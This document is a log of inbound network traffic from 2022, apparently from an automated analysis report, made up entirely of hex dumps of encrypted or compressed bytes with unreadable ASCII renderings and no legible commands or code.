                                                                                                                                                    2022-09-29 12:58:53 UTC896INData Raw: d3 e8 bb 24 8e f5 8a e1 3d cb 76 c8 f2 e8 a8 d7 25 e2 4c 09 4a ea fe 7b 03 31 32 30 a1 eb 9e 30 07 dc 62 14 e5 ae e8 1b cf b0 b7 9d 9e 36 15 47 9b 61 30 45 ad 52 eb 36 8c 12 62 37 23 77 9d 2b 5b 5d 30 2e 66 45 dc 82 54 b4 9f 25 0a 38 5c c7 1d 53 a7 a9 77 6c 83 be fe b8 44 29 da f2 53 f8 36 04 92 a3 8e 40 e1 ec cb fa d4 93 45 f0 ff 4a ee 63 d8 33 55 32 86 d0 f3 31 01 03 2e c0 c8 f7 44 87 17 f6 77 a0 ac fa 44 36 04 de 37 88 f2 00 78 86 35 f4 f8 e5 6b c3 e6 6c 6b 8a 05 d1 08 24 8f 37 16 71 80 b4 39 95 7a 03 0b 3f 78 4c 7a a2 e2 60 3a 37 03 8f 31 74 70 4a fd 2a 4c dd d2 4d d2 b2 07 8d 86 c5 a3 6f 4b 9c ca 33 c4 00 d9 92 3a 35 96 e8 9a bb c4 e5 47 32 0c de da 22 5b 09 fe 51 51 ad 1c 39 c0 8b 72 da 41 34 da 40 98 40 f7 8a 48 6f 7d 74 ee c3 8b de 61 de be 5c 1b
                                                                                                                                                    Data Ascii: $=v%LJ{1200b6Ga0ER6b7#w+[]0.fET%8\SwlD)S6@EJc3U21.DwD67x5klk$7q9z?xLz`:71tpJ*LMoK3:5G2"[QQ9rA4@@Ho}ta\
                                                                                                                                                    2022-09-29 12:58:53 UTC897INData Raw: 4c 6e 17 60 26 d6 b8 2e bc b8 0d 14 1e 68 07 de cf 2f 81 06 53 f1 d8 f3 11 de 51 ea 61 eb 05 13 7d 9a 74 47 4b 9b 5b 9b cb da 88 a7 70 b3 99 c4 db 0a 4d f6 1f 23 3f a4 4a c8 c6 87 5a d7 14 bf 84 8c e3 c2 2f 0d 54 60 01 d3 e3 25 94 bb e1 fa 9c 24 8e 24 b2 85 0f 8c 1c bf dd aa 8f 92 76 d5 10 55 e9 85 e7 3f a6 59 e6 50 ea 58 74 3e e9 36 81 7f 64 fa 3d 2d 78 01 5f 76 dc a2 aa 15 e9 21 58 84 62 54 a9 c2 c3 4f 8d 5e 92 7c f6 fc 53 88 79 83 10 94 e5 97 f1 da 66 01 50 66 eb e7 cf 9d da 9e 12 df 93 e5 d7 22 f3 de b2 12 d0 91 6d 2a 62 e1 b2 d3 0b 75 44 54 06 5e aa 8c 78 07 bc 88 1d a0 78 d6 16 59 a0 68 f6 5c ed 3e cf 43 03 b9 49 7f 13 40 00 25 6e 91 23 17 61 91 78 8e ed 54 1a d4 f0 ae 13 d1 99 ef 2a 27 e5 c3 89 c7 db 69 dc 5e ab ab 84 46 e2 f8 0d a2 33 db c1 f2 18
                                                                                                                                                    Data Ascii: Ln`&.h/SQa}tGK[pM#?JZ/T`%$$vU?YPXt>6d=-x_v!XbTO^|SyfPf"m*buDT^xxYh\>CI@%n#axT*'i^F3
                                                                                                                                                    2022-09-29 12:58:53 UTC898INData Raw: 63 e3 68 e4 c6 9e e2 a3 8a e6 d7 62 10 67 57 ba e7 b9 c7 5a ab d4 1e 61 6b 7a e6 9e 78 da ba 6b 52 b8 00 21 07 0a c2 7d 23 1e da b9 80 18 e8 90 73 f1 40 9a b3 d6 8d cb fb 2b 97 be 02 7f b4 d3 39 95 af f4 72 63 1e f6 a2 da 49 87 cb 47 ce 05 7e c2 a2 bb 0f b0 5a d1 c7 0a a9 da 0e 24 29 3f 0a 03 eb cb 00 ef 15 6f 51 b5 c1 80 75 05 95 a1 e3 df e0 2d d6 cb 6a ab 53 f8 c4 8f 5b 90 16 7d c9 24 31 2f 8e 42 1f dc 33 f6 58 5f 96 e6 28 f9 68 63 11 67 1c 83 37 a5 ad 2e bb a0 e0 7c 62 ef 1d 2a 07 18 7a d4 d0 f0 41 97 89 fe 2e 6b 2f 72 9d 4d ce 6e 94 a6 61 a8 78 87 d8 1b e4 6c b5 ce 4b b5 4f ce 55 4f c4 7c 10 59 6b de 43 3d 1d 4d 6f 20 d5 10 92 32 d3 d0 b1 1e 16 fd 92 52 22 75 ac 25 04 23 30 66 49 aa 72 ab 57 e1 17 ac aa b6 02 5a 01 0d bf bc ee 23 7f e9 39 c4 b9 8c 4a
                                                                                                                                                    Data Ascii: chbgWZakzxkR!}#s@+9rcIG~Z$)?oQu-jS[}$1/B3X_(hcg7.|b*zA.k/rMnaxlKOUO|YkC=Mo 2R"u%#0fIrWZ#9J
                                                                                                                                                    2022-09-29 12:58:53 UTC900INData Raw: c0 16 26 bf 4d d1 e2 51 32 8a 2b 03 c7 b7 f9 d1 0e 3d 2e aa ef de a2 03 b0 5f d8 33 90 de e8 7d 7b fc 48 a0 da c8 f5 c6 86 d8 96 eb 2b 47 41 91 97 3f 56 0f 04 69 e4 bc a0 ad a2 df 3a 88 d6 91 74 0d 11 63 75 81 a5 a3 9f 28 0a 78 4b bf a8 30 80 42 bd cd 1f 1a 01 5b a2 14 9c 88 c1 a5 1e 59 09 b5 4b da 67 69 01 ca b1 f9 a0 91 aa 84 41 bd 2c b6 d1 46 be 13 2d 8d 9f 2c 4b ef 0c ae 79 6c d4 de d0 be 9f 45 8f e9 ef 5e 26 fb ad 99 0a 25 df b8 fc 04 3a 36 81 83 80 09 94 dd dd 8c 1d e1 d4 51 ce 78 3c 64 d6 04 0f ee dd 54 ac 34 ba c5 3c eb ee 1f 80 3a 91 8f ea 5a 85 94 67 c9 bf 4f fc 1f 6e 48 dc 90 bc 11 9f 39 86 d0 a1 f4 13 f9 f8 86 94 63 97 b2 0c f9 ef 6d b4 7e 94 fe fe 0d 2a 15 d9 58 f9 f2 c4 b8 6d af 6a 14 b8 9a 0b b7 09 73 1b 41 e8 53 d5 d7 5e 83 a4 07 00 5c e2
                                                                                                                                                    Data Ascii: &MQ2+=._3}{H+GA?Vi:tcu(xK0B[YKgiA,F-,KylE^&%:6Qx<dT4<:ZgOnH9cm~*XmjsAS^\
                                                                                                                                                    2022-09-29 12:58:53 UTC901INData Raw: 4d 75 31 64 cd 2b 67 52 d1 94 ed a5 1e 34 cb 3d 1d 89 90 b0 dd 42 2c 1b e6 9d 8b 1d 63 62 0e f2 67 1e d0 72 19 41 97 fb a7 32 20 81 12 5d 2d fa 6e cb 7a ce 85 ac 3c 78 01 ba 59 39 79 9b c6 6b b5 68 82 d7 4b 64 75 6e 8c fb 80 3a 9e 4a c8 df 93 cb 87 51 79 6f a1 b0 34 77 4a b3 a6 6e 3b 55 a3 7d 93 c7 64 35 e9 33 1c 52 35 db c6 e3 c5 15 c0 24 df 09 5c 7c 94 f4 8f ae d9 c8 a9 5f c6 8c 5c 83 e1 17 3e 85 67 c4 a6 cc f6 cd 8a ad db 36 87 25 5f ed 93 48 ab 2d 8c 2a ee e5 21 c4 f0 d8 89 33 41 9a 16 14 69 b3 2d e5 06 c4 65 37 f7 ef 13 b7 a2 bd 1c 59 97 cb a2 c1 68 7b 4f d3 2d b0 d5 13 06 53 5a 4d a8 55 ad d3 90 80 6f 0d 3e 5f 60 fd f5 b1 61 09 0d 57 ee f7 53 d6 9c 37 22 54 29 95 cb 7e dd 06 85 b0 a5 a6 8a 63 d3 91 3b 0e 87 53 7c 5d 33 ba 80 3a ed 7f fb b4 dd 5e 27
                                                                                                                                                    Data Ascii: Mu1d+gR4=B,cbgrA2 ]-nz<xY9ykhKdun:JQyo4wJn;U}d53R5$\|_\>g6%_H-*!3Ai-e7Yh{O-SZMUo>_`aWS7"T)~c;S|]3:^'
                                                                                                                                                    2022-09-29 12:58:53 UTC903INData Raw: 12 e0 6c 86 d1 e9 5a 55 44 35 21 e0 80 b1 1d da 3e f3 c1 e9 a1 0e 23 54 85 3c 8b 40 73 1f 4e 6e 31 07 39 c7 76 fb 98 c0 66 2b 8e f3 6f 3d 5b 84 4c a0 0d c8 94 ea d4 08 68 66 34 01 8f fc 37 4f 91 24 a2 32 4d b0 42 1f 91 d9 60 ed 91 9d ef 2e 97 a6 64 07 b2 66 e8 68 64 a1 27 b1 5f cd 33 6c cf 77 e6 bb 13 03 b3 ea 39 4e d7 4b 15 38 cb b6 71 64 45 43 c9 c4 b1 13 cd bf d9 e4 a5 6d 8b 19 d6 a2 77 ff 04 64 f0 b9 e7 9c 5b 3a 9b 85 05 c0 0a 93 20 e2 99 1e 84 a8 e0 b3 57 8b 06 01 1e 6b 9f b0 84 f1 cf c5 d1 2a 19 a4 91 e7 45 36 b4 1c 7f c0 99 0d 69 e0 e0 c1 96 1e e1 69 7a 53 b4 af b9 5b 6b 8a c3 ee e0 91 9b 0b 20 d4 99 50 13 19 06 0a d8 02 73 f6 e2 4d 79 51 26 ec ff 26 ed 51 23 46 c0 e3 74 ad ce 1c ae be f3 ca 16 ef e2 d4 55 c6 bc 92 ad 27 56 a1 9d 91 f0 b2 4c 09 0b
                                                                                                                                                    Data Ascii: lZUD5!>#T<@sNn19vf+o=[Lhf47O$2MB`.dfhd'_3lw9NK8qdECmwd[: Wk*E6iizS[k PsMyQ&&Q#FtU'VL
                                                                                                                                                    2022-09-29 12:58:53 UTC904INData Raw: 46 d1 b9 9e 1a d4 b4 27 0d 2c b8 89 e0 00 8e 49 51 66 fb 18 bb b8 a8 d9 9f bd f6 ce a7 24 cc a1 ae 02 a0 98 b0 36 18 85 f6 bd 70 2f 7c 15 b8 7f 45 c0 89 eb dc 8a 2c 75 81 c5 9f 71 52 34 73 03 9c 32 ed 98 68 a6 bb a5 42 90 67 f2 2e 34 74 6a 29 82 60 b7 61 f6 5f 5b 7c 4d 19 75 33 ec 52 f8 eb 3a f4 ef 3a 56 2f 93 1d e3 b6 00 80 2d 79 15 c7 a6 95 e4 25 3c f8 f2 08 e8 46 9d 5e 01 1a 0f a8 a2 fc 5f b2 8a 7a 7a 35 3c 8c cc fe 72 c5 51 61 f5 cb 7a c7 79 39 49 3d c4 3f 34 73 a9 d0 12 78 c1 23 65 9b 86 ca 78 aa 54 b4 23 dd c0 7e 8e 07 21 d7 b3 7d d3 aa 46 7c 95 54 a5 51 ae 3d 30 04 3b 18 27 21 70 85 14 04 ac a3 90 8c 85 d7 81 aa 2c e5 24 a4 18 7f f0 45 33 27 df e3 9b 94 e8 05 f2 51 9f 21 c8 ee b8 40 73 68 15 72 6f f8 42 1b 38 a5 ca 66 ab 32 1d 91 b7 2d 4a f1 01 bc
                                                                                                                                                    Data Ascii: F',IQf$6p/|E,uqR4s2hBg.4tj)`a_[|Mu3R::V/-y%<F^_zz5<rQazy9I=?4sx#exT#~!}F|TQ=0;'!p,$E3'Q!@shroB8f2-J
                                                                                                                                                    2022-09-29 12:58:53 UTC905INData Raw: f5 17 48 83 11 6c 16 33 8c 94 48 d1 b4 fe 32 cc a4 83 bc 13 76 af 2d 2c 8f f9 3d bb 08 71 85 5e 1a 07 23 ef dd e1 3d 9e 6d 91 36 9f b9 b7 f2 48 49 70 1e 07 4b 4b b1 00 a1 48 71 45 a8 96 0b 8c 24 8a e2 40 c5 df 95 16 ca 89 da 22 d2 43 74 38 31 5e b1 4e 84 03 42 87 03 bc 4e 92 37 93 ab 84 a2 43 e3 f1 e1 6a ed 31 be 64 cc e4 03 33 1b b1 36 a0 d9 d1 70 d2 c7 3f 81 0d 14 3b 45 48 62 64 e6 cb 7b 47 3c 44 d0 63 27 b4 9f ac 3c 18 04 3c ce 7a 8c 8b e9 16 b0 e6 3d 27 1c 2a cb 83 d1 96 d5 1b 6e 1b b4 4c a7 7d 3a 40 8e ae bd 6c f2 c1 62 ba 7a af 33 3e ef 05 4c 45 58 3a 1e ec fb 49 ec 38 fb 04 5c 07 ff 8e eb fb 6b 42 72 24 e1 c3 c1 93 14 fe 47 ef 83 2b be 72 51 ec 1e f7 8e af 9a e9 3d a5 e5 21 df 81 34 1d 7f a4 6a 6c 3e 2e 18 e3 1e e8 46 5f 90 1d ef 19 46 5f 03 11 ae
                                                                                                                                                    Data Ascii: Hl3H2v-,=q^#=m6HIpKKHqE$@"Ct81^NBN7Cj1d36p?;EHbd{G<Dc'<<z='*nL}:@lbz3>LEX:I8\kBr$G+rQ=!4jl>.F_F_
                                                                                                                                                    2022-09-29 12:58:53 UTC906INData Raw: 0c 98 40 fb 1a d8 c9 a3 15 40 64 53 58 11 81 e2 ca ad 34 4a 9d 0c a3 b6 8d 48 24 2b b8 db e3 2a 64 8a 83 ad f2 b8 a7 1c f6 70 18 a4 77 d4 90 d2 76 02 de 87 de 17 86 09 a7 24 9f 4e 7e 54 bd 69 72 a5 8a cb 22 c3 80 db 84 2d 94 8f e5 13 0d 4e 1e 2d 47 5b 78 c2 e6 82 ab 10 97 cd 1d ea 91 be 43 80 e3 1b 49 04 32 b3 fd 80 a9 4f 9f 2b 21 bb 25 15 1f 35 70 58 8b 4c 07 f7 4e ae b3 4c 9d 48 bb 91 2d 7d 35 33 d1 57 69 1f fd a6 cc db 0c bc b1 f9 b5 76 0d 04 f0 5e fc ad e2 04 c3 d5 ab 5a 10 3a cb 6c 95 46 b7 ce af e3 10 71 8d f8 48 c0 81 13 8a 4a 69 64 d0 57 bd ca 40 b4 38 3c 16 8d e8 c4 4b ea 6d a3 76 a5 fe 46 83 a5 f1 ae 32 f2 9c 7c 3a 9f c9 0e c8 42 c6 da 81 ec 06 b0 85 19 fb 5a 29 2b d0 93 9b 70 f0 2f 75 61 be ed 07 6a 19 0b 7f 55 fe f8 40 5d 8c 15 0a b2 19 90 3f
                                                                                                                                                    Data Ascii: @@dSX4JH$+*dpwv$N~Tir"-N-G[xCI2O+!%5pXLNLH-}53Wiv^Z:lFqHJidW@8<KmvF2|:BZ)+p/uajU@]?
                                                                                                                                                    2022-09-29 12:58:53 UTC922INData Raw: 6a 51 3b 17 d1 c6 ce 40 47 99 39 da a3 d1 7b 8e 27 69 88 c2 de 38 91 14 44 b8 e8 72 b8 29 9b c7 8a 58 e9 3c 79 09 9d db d8 de 72 e2 05 29 6c ad 3e c6 70 06 af 35 e2 b8 cb aa 1a 8a 23 c1 c5 ac 64 0b 89 68 49 db 1b 40 97 7b ba c5 da 82 b0 96 ba 3d 3f cc 3c 92 8e 20 39 fc e2 c8 70 12 6a 89 c6 fd 70 bb e7 cf 47 44 00 d2 80 a3 b1 7a 26 38 ff af 8b 0f 50 4b f4 dc 14 ea 73 d7 64 5c 9a df 1c f6 ff cd 2f 13 17 f8 61 eb c1 3e 6d fc 19 81 3d 86 11 ff d0 d8 f4 f8 07 1b 93 fb 34 5c 85 ed 78 39 e8 23 43 31 34 b8 8e c7 b0 34 3d 39 1c 36 71 d1 23 51 2b 3f 51 d1 93 77 ea 23 cb c1 19 1d 3e 34 fb 48 b4 d9 12 9e 85 5f b9 7f b5 63 0b 25 7d a4 f7 f7 7e 8d e8 ee 7f 97 91 58 5e cb 29 bf 55 b7 57 24 69 f7 33 2c 62 5b fe 99 de 85 17 ad 69 ce ef cf 8f 3a 8c c7 f6 9e 1f 8d 0a 16 37
                                                                                                                                                    Data Ascii: jQ;@G9{'i8Dr)X<yr)l>p5#dhI@{=?< 9pjpGDz&8PKsd\/a>m=4\x9#C144=96q#Q+?Qw#>4H_c%}~X^)UW$i3,b[i:7
                                                                                                                                                    2022-09-29 12:58:53 UTC938INData Raw: b6 21 8e 91 a8 67 92 be 7d 08 74 8a b7 12 b0 a9 a1 39 bb 1b fc 89 65 cb 79 62 ef 1b 71 2e ab 4c 22 f7 db 2a ba 3c 42 cc 87 bf 37 cc 92 31 21 bb 0e dd 89 4f 19 bc 54 02 a9 19 22 56 e8 dd c2 3c 39 8c e7 22 0f 92 cf 3b 9c 32 97 fd 14 c8 7d 5b b2 e3 a1 43 c8 06 b0 ee 8a 03 55 a6 21 f2 d3 0c 4f 5a 5c ed 1b bb b3 1b b2 ef ca fb ad 3b 82 25 aa ee 2c 15 94 3d 4a 24 b8 21 76 90 b7 9a ae d6 aa cf b5 7c 3a 2e 92 38 9c cb 1d 27 71 5f eb 38 16 15 08 9c 9b 86 b1 ca 9b 11 b1 05 79 69 0c be d2 f0 6f 93 ed 1c 4d 69 7b d0 87 2c 37 84 0c 0e c6 af 31 62 4c b5 ab 7b db 24 50 43 03 19 a7 b7 f8 12 1a 7c 16 b0 09 95 34 0b fd 6c d2 87 b3 36 cd c8 11 2d 8a a6 f2 c7 65 34 df 8b 08 fe 71 82 42 f7 00 67 ae a1 40 95 22 f8 e9 84 c8 23 79 0f e5 1c d2 aa c9 69 a5 6b 66 3f 9f 14 c3 af 2f
                                                                                                                                                    Data Ascii: !g}t9eybq.L"*<B71!OT"V<9";2}[CU!OZ\;%,=J$!v|:.8'q_8yioMi{,71bL{$PC|4l6-e4qBg@"#yikf?/
                                                                                                                                                    2022-09-29 12:58:53 UTC954INData Raw: 6a e8 78 09 62 5e 9e 38 7d f5 a0 90 8b 43 3a c4 59 e1 b5 12 60 52 db c8 26 a6 e9 39 88 85 dc 2d 71 85 48 d6 eb e6 23 fe 3a 47 b1 d6 ad 87 91 a4 e0 6e 00 62 4a ca 74 a6 85 07 5f 3d 1f 0f c3 a9 84 2a ea d1 33 95 af ed f4 c8 7c 32 b5 e0 65 43 3c d8 a8 0e 99 5b f5 bd c7 8f 1a ab 06 02 c4 5d a0 f9 9b 99 f3 fd 34 f2 e8 66 3d d8 08 f7 f4 14 de a7 e8 7c 9f e3 d5 3c 22 a1 8a 86 c9 5b ba 71 b2 b7 f9 db 3f 31 2a 6f fe 19 51 a9 45 09 7f 60 59 34 ed 2c 6d 2e a9 47 ac 3f fa 4d 04 f5 d3 2e 4b 56 82 42 7e 52 a3 69 aa 71 a9 9b 8a 32 71 dd 16 79 6a 56 b2 f3 f7 9a b7 22 c4 b1 4c 2a 27 3e 8e 2e b4 d2 34 41 0e b6 a6 10 c5 98 e0 e9 82 9b 98 7b 18 4a a6 0d 47 d9 12 42 b3 ce b5 56 50 40 8b 25 00 f8 20 9f b0 72 32 99 23 0e c0 25 5e db d7 53 8f dd 1f 33 a0 46 7b 3c 93 a5 30 51 da
                                                                                                                                                    Data Ascii: jxb^8}C:Y`R&9-qH#:GnbJt_=*3|2eC<[]4f=|<"[q?1*oQE`Y4,m.G?M.KVB~Riq2qyjV"L*'>.4A{JGBVP@% r2#%^S3F{<0Q
                                                                                                                                                    2022-09-29 12:58:53 UTC970INData Raw: 7d 30 10 05 7e 64 0a f8 f5 c1 67 5b 9e ae 27 91 1f d5 ae b9 ef e1 5d a0 da c9 0e fe c7 95 fe 32 7e 96 c0 df 02 7f 2e 1c 21 19 e6 6e 7d 66 a2 6f e5 c6 31 cb c4 85 e6 b0 e5 0e a5 ba a6 2f a1 43 7e 0b 54 d2 61 55 80 0c ea d8 86 b6 a1 49 63 df be a3 d7 7a 98 f8 29 aa 2d f2 76 7c 0b 1b bb f4 e4 e6 f1 83 ec 0b 6f f4 7a 6a 04 1e a6 30 f4 69 c7 2c a5 3a 80 eb d4 1c 6a 0d eb bb 8c 58 bf 33 84 82 90 50 37 a6 37 d0 e2 bf 1f b4 a0 3d a2 35 fe 18 50 ad 05 36 8b f4 fb 34 cb 80 a4 02 ce 76 09 fe c9 40 ad 8e 5b 2d 35 9a 83 43 fe 0d 87 ff 26 00 d4 7f 57 b3 c2 6e 30 ef 51 11 d7 f4 4b 51 09 71 22 ff d5 eb 61 27 31 4b ca c3 ff 7d 20 5a e6 af ad 7b fc a8 97 59 be ed bd 06 8d cb 47 f0 13 ba 4a 1c b5 12 72 c7 d7 16 00 de 4d 58 eb ea 90 8d 73 b7 8b ad d7 31 d1 bb 95 27 33 d4 b2
                                                                                                                                                    Data Ascii: }0~dg[']2~.!n}fo1/C~TaUIcz)-v|ozj0i,:jX3P77=5P64v@[-5C&Wn0QKQq"a'1K} Z{YGJrMXs1'3
                                                                                                                                                    2022-09-29 12:58:53 UTC986INData Raw: ea 92 64 f9 eb 4a cf 3a 34 a4 57 e3 80 a5 3b 12 a5 66 8b ce b1 85 9d d3 6f 83 bd e8 59 54 6a bb 52 62 d6 d1 0c c5 9d 29 c1 50 f4 a4 4c 07 5e c7 1f ee 44 c6 ba f6 1f df 08 9e d3 dd fd e7 75 12 a8 66 49 08 39 cd f6 5f e6 57 a1 97 1b 01 bd c2 06 ff 2f 1e f3 ec f7 1a 91 c7 14 bd 37 56 62 ee 8f 97 cd 23 56 dd 0e 02 8b 45 02 09 8f f9 72 0d e7 80 8b 61 a0 53 b3 a1 67 22 a8 b1 e2 03 d4 a2 96 24 e8 db 52 0b 62 28 c7 55 23 0f ed 96 02 8e 52 d6 77 51 8c 4a e7 b0 a0 0a d6 51 ac 72 07 c1 d6 18 8e 88 5e 8b ad 1f b5 4e cb 07 1b ad 7e 61 20 42 4e 08 28 44 2f 52 80 1f 69 5a 39 c6 6f bb 8e 27 86 94 7d 3e cf d5 0e 5c 0d a5 c5 60 dc aa 1d 72 50 73 12 96 ef df 2e 96 98 18 27 d3 1c 17 94 cf 11 b3 9d cf 03 29 4b 70 65 7c 64 0b 2b 56 96 40 93 e7 98 6b 5d 58 f3 0c e1 9e fc d2 9c
                                                                                                                                                    Data Ascii: dJ:4W;foYTjRb)PL^DufI9_W/7Vb#VEraSg"$Rb(U#RwQJQr^N~a BN(D/RiZ9o'}>\`rPs.')Kpe|d+V@k]X
                                                                                                                                                    2022-09-29 12:58:53 UTC1002INData Raw: 59 67 0b 19 d2 f6 5f 01 a2 23 bd 79 71 d9 51 c5 66 a3 db 61 58 c5 b5 84 91 db e6 4c 5f 1f a6 01 62 b5 4d 19 cb ac a4 96 05 56 eb 21 19 ca 05 7c 36 a0 2c 19 f9 c6 34 79 a7 b9 3c bf e3 98 1c 55 23 6a 3b b2 c9 dc 49 2a bb 2b 45 e7 55 1c 92 35 1e 80 b0 ee 62 fc 69 b7 35 d9 62 0e fb 2f e2 a2 f7 bf 68 ec 11 ef be 22 55 ba f5 aa ef 8c 51 ea 69 31 a7 e2 5d 52 7e 4c 5f a1 97 01 ae 20 2a 17 a8 21 db 16 30 ef c6 ab c4 d3 b2 1a 79 78 79 9e aa c4 e4 00 92 fa 28 68 de e8 80 f7 92 0f c2 c3 8f 76 3e 51 2e 0b 9c 6a cb c6 d4 6a 2a c2 ff 57 d3 ab ea 35 ef 57 df 8e df b8 12 55 b6 d9 46 ec 08 2a cb 14 c9 5b 14 f2 af 4e a8 67 20 66 49 17 4b 2e 86 ce 1e 93 de 14 8e 83 4d ab f1 38 69 30 8d 31 65 58 41 bc 90 f1 20 4f ed d0 93 7f a1 ee e0 13 d9 a8 d6 87 e5 30 3b b8 84 b1 7c e8 c5
                                                                                                                                                    Data Ascii: Yg_#yqQfaXL_bMV!|6,4y<U#j;I*+EU5bi5b/h"UQi1]R~L_ *!0yxy(hv>Q.jj*W5WUF*[Ng fIK.M8i01eXA O0;|
                                                                                                                                                    2022-09-29 12:58:53 UTC1018INData Raw: 62 20 07 65 82 ef b6 c3 26 8a 95 c8 ce 62 ca 7b c0 24 f5 91 07 80 47 91 95 0a 63 7d 18 ca 6f 2a ea bb 08 ba 6c 25 4d 50 0d 36 e3 fe bb 25 5f 53 62 ef 69 d9 76 00 66 a9 60 ca ed 4f 9c cb 74 e8 d4 3a 4a 2d 29 3e 59 ef 00 0c 9d 7b 9e eb 1f db 61 ef e7 f6 79 2b 17 7b f8 d1 9a 78 57 52 55 cf e6 80 41 70 c2 67 18 5c 16 f2 81 20 79 b5 65 df 54 2a 01 cb 3e 65 c1 81 a7 58 a2 78 0d 31 23 96 06 0a 77 2e 32 f7 28 9e 00 a0 21 1b 27 55 63 51 dd 6d 53 c2 ae 3c f6 72 45 75 f7 17 94 70 15 85 eb a3 47 3f e0 dc 4a c9 ad b4 51 d5 5a 64 08 26 00 6a 46 bd 91 7f 26 68 53 e9 21 ba 45 63 57 4f 06 4f 8b f7 31 4c ab cf 38 dc 49 1a 79 dd a4 ff a2 27 5c ec af f5 76 ea 32 bd 83 94 f9 c7 38 b5 52 06 bc 13 36 46 64 91 40 05 7d 1e e5 31 ab e8 34 57 17 1d 6e e6 0f f5 70 b2 f9 30 3d 1e 4e
                                                                                                                                                    Data Ascii: b e&b{$Gc}o*l%MP6%_Sbivf`Ot:J-)>Y{ay+{xWRUApg\ yeT*>eXx1#w.2(!'UcQmS<rEupG?JQZd&jF&hS!EcWOO1L8Iy'\v28R6Fd@}14Wnp0=N
                                                                                                                                                    2022-09-29 12:58:53 UTC1034INData Raw: c8 d0 e4 53 5f 9c b4 59 61 54 26 36 c1 e0 f4 af 77 d8 1b e0 16 62 41 ea 11 20 7b 0b 1e 29 22 0e 39 31 d7 f9 ac e8 3b aa 3f 02 c1 0d d9 82 8b 34 bd a7 cd 71 19 1b a5 0a 72 f1 23 83 3a a2 a0 73 17 cb ef c9 ea 86 9b 87 72 26 f6 c1 13 00 52 a1 7a 5e 92 93 ac 86 bc a4 a1 ca e3 88 a8 a7 2e bd 62 40 89 83 02 79 11 73 2b d0 03 a9 8f 94 78 d0 fb 39 4c 1b 73 ee e4 37 1b da f6 bc c5 5f 8f 0a 11 ca 98 31 2d eb 9f 06 d0 72 ed 42 b1 e2 23 09 ee 51 19 74 8b a5 7e 7d 20 d2 f5 4a ed ab d7 b2 af 6e c0 5c da c2 7e d5 91 53 97 ce 4e e9 1a 88 d7 90 b4 6f 8c fb 89 2d 93 6a 56 28 b8 0d f5 86 c3 6b f4 d8 b7 22 cf 64 0c 76 6a ec 66 b6 21 c5 1f db 57 2f 1b cc 76 38 92 bb 04 fc 51 22 aa 4e 9f 5c bf 2a 38 85 cb cd 03 c9 01 85 c5 70 93 95 0d d3 73 70 5b 6d 9d 97 82 31 a1 da 02 54 cd
                                                                                                                                                    Data Ascii: S_YaT&6wbA {)"91;?4qr#:sr&Rz^.b@ys+x9Ls7_1-rB#Qt~} Jn\~SNo-jV(k"dvjf!W/v8Q"N\*8psp[m1T
                                                                                                                                                    2022-09-29 12:58:53 UTC1050INData Raw: ed 23 ce 39 6c 23 6e 2e 6a 28 94 cb e6 16 51 1a 99 5f 79 ac 45 b9 e3 c5 21 0f 45 55 8e fd 4b 68 5d e8 5c 22 32 99 7f c9 87 57 a7 3c f0 df 6c aa 77 a3 04 f4 a4 77 e5 a8 c6 be 46 bd c3 15 5a ee 08 e8 b9 df ec f5 d8 b3 44 fb 98 d3 3a ae a8 ec b9 64 8c c5 30 2f 3d a8 9d ff 7c 00 be ab 9b 32 b5 13 d8 03 5f 0f 90 33 b5 75 23 7e d8 db 15 85 c8 a1 42 68 74 75 d1 8f d0 63 97 1b 75 ff 4c a0 54 3d 53 57 18 c9 95 b4 55 32 13 88 50 83 34 47 6f bb 2e 48 b2 13 52 35 32 19 09 d7 73 65 77 9b 71 92 53 a5 c8 d8 a0 3f 85 ba 1a 29 88 d7 6f 48 45 fb 61 e0 e4 b0 08 18 d2 97 c1 a0 4c 2d 84 03 da e8 9a ce 0b 12 6d d1 91 a9 33 8b 2a 0e 62 cc d3 ac 9d 87 48 cf f5 3a 6b 83 10 a7 e3 bb 93 89 5b d1 62 20 b1 2c 53 ba d8 a5 9d f2 64 06 aa db ed bc ff d4 2e 7c 59 b0 9b e5 c9 40 aa f7 7d
                                                                                                                                                    Data Ascii: #9l#n.j(Q_yE!EUKh]\"2W<lwwFZD:d0/=|2_3u#~BhtucuLT=SWU2P4Go.HR52sewqS?)oHEaL-m3*bH:k[b ,Sd.|Y@}
                                                                                                                                                    2022-09-29 12:58:53 UTC1066INData Raw: 3b 25 07 ee 34 33 31 fa 6c 7d a0 6b bc 6a d6 11 8c 9e 82 19 95 d0 06 df 22 a8 5c 08 49 d2 8b d5 19 c2 8c 0d a2 5a 7a c0 78 1a ee de 7a 27 d3 ad 07 fd c4 dc 32 7d 0f d1 04 90 79 c1 c0 19 3b df b5 06 69 e9 33 0b 62 be d1 70 96 31 aa 2b 16 e6 90 44 e6 d2 32 77 fa b0 79 60 e1 9f 61 fd d4 23 39 85 a0 d3 57 b0 80 db e9 ee 18 6a e8 09 41 22 fa f0 8a 42 94 b2 13 5b c0 98 22 4a 77 15 e1 56 05 d4 6b 2e 90 76 06 a6 b4 83 65 be b4 23 48 36 70 fe 96 f9 7e a1 71 f2 c2 76 79 8d 51 f1 35 fe 7e b7 ea 48 40 ef ef 22 a0 6a 24 76 6f 97 c1 a1 aa ae 38 20 ac fa f8 76 17 5a 7f 80 0c ec bb f8 20 be 12 49 cf a1 68 e3 2c 90 1f 2e 43 98 c2 84 9a c3 33 0b ba 9e 8d d3 10 a0 31 92 b9 2e 48 57 f2 3a 41 bd e0 a3 62 ee 68 b6 c1 c0 36 6c 4f e6 cd d9 5d 82 c4 95 f2 f2 8e 01 3f a5 65 aa 89
                                                                                                                                                    Data Ascii: ;%431l}kj"\IZzxz'2}y;i3bp1+D2wy`a#9WjA"B["JwVk.ve#H6p~qvyQ5~H@"j$vo8 vZ Ih,.C31.HW:Abh6lO]?e
